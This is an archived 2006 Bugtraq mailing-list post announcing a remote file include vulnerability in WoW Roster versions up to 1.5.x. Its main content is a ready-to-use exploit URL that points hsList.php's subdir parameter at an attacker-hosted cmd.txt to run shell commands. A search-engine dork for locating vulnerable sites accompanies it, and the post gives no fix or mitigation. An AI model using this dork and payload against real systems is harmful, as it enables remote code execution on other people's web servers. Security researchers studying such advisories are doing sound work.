lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list] 
Date: Tue, 01 Aug 2006 15:22:50 +0000
From: "AG Spider" <ag-spider@...mail.com>
To: bugtraq@...urityfocus.com
Subject: WoW Roster <= 1.5.x Remote File Include (hsList.php)

Title : WoW Roster <= 1.5.x Remote File Include (hsList.php)

###############################################################################

Discovered By  ::::  AG-Spider

-----------------------------------------------------------------------------
Class  : Remote file include
Rish   : Danger
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5"

Exploit    :  
http://www.site.com/[wow_roster_path]/hsList.php?subdir=http://[Shellc0de]]/cmd.txt?&cmd=ls


----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx - KaBaRa.HaCk .eGy]

c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net

_________________________________________________________________
The new MSN Search Toolbar now includes Desktop search! 
http://join.msn.com/toolbar/overview

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux